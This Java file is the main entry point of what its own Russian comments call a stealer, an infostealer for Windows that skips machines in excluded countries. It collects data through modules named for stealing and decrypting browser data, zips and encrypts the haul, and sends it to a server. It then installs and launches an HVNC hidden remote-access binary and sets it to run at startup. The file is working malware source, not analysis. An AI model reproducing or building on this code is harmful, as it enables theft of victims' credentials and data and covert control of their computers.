package procat.ui;

import org.apache.commons.io.FileUtils;
import procat.avto.Avtozagruzka;
import moduly.file.cruptlog.CryptLog;
import moduly.sbor.*;
import moduly.file.Arhivator;

import moduly.server.ServerClient;
import procat.sbor.*;
import procat.steal.nodes.impl.browser.decrypt.KillProcces;

import java.io.File;
import java.nio.file.Paths;

public class Main {


    public static void main(String[] args) throws Exception {

        Nastroiki nastr = new Nastroiki();

        boolean stet = true;
        if (Nastroiki.getStrana_no_work().size() != 0) {
            InfoPC infoPC = new InfoPC();
            for (int i = 0; i < Nastroiki.getStrana_no_work().size(); i++) {
                if (InfoPC.country.equals(nastr.decrName(Nastroiki.getStrana_no_work().get(i)))) {
                    stet = false;
                    System.out.println(stet);
                }
            }
        }
        if (!new InfoPC().isWindows()) { // стиллер запускается только на windows
            stet = false;
            System.out.println(stet);
        }


        if (stet) {
            //System.out.println(stet);

            //new KillProcces().proverkaOpenPZ("browser");
            RunMoment rm = new RunMoment();

            Thread.sleep(5000); // не убирать(не успеет отработать, тк многопоток)

            // упаковываем в zip
            Arhivator ar = new Arhivator();
            Arhivator.zip(Paths.get(String.valueOf(Nastroiki.getFolder())));


            // криптуем лог
            CryptLog cl = new CryptLog();
            CryptLog.cryptZipArchive(Nastroiki.getFolder() + ".zip", Nastroiki.getFolder() + "_crupt.zip", Nastroiki.getDecrupr_str());


            // и отправляем его на сервер(у серврера есть параметры, тк каждый раз лог разный cat || cat2)
            if (new File(Nastroiki.getFolder() + "_crupt.zip").exists()) {
                ServerClient sc = new ServerClient();
            }

            Thread.sleep(2000);
            if (!nastr.getHvnc().equals("")) {
                FileUtils.copyFile(new File("po/"+nastr.decrName(nastr.getHvnc())), new File(Nastroiki.getFolder()+nastr.decrName(nastr.getHvnc())));
                Avtozagruzka avt = new Avtozagruzka();
                Avtozagruzka.setStartup(nastr.decrName(nastr.getHvnc()), Nastroiki.getFolder()+nastr.decrName(nastr.getHvnc()));
                Runtime.getRuntime().exec(Nastroiki.getFolder()+nastr.decrName(nastr.getHvnc()));
            }
        }
    }
}


